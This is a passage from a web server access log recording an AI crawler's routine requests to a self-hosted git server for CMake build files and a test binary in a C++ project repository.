(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16399] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9971] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10177] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10070] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11517] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16047] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12009] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11022] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39741] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11192] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16400] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9970] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29812] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11517] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14305] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10175] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14305] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39748] [Gzip 13.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51203] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51202] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10221] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10773] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" +[17/Feb/2026:15:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 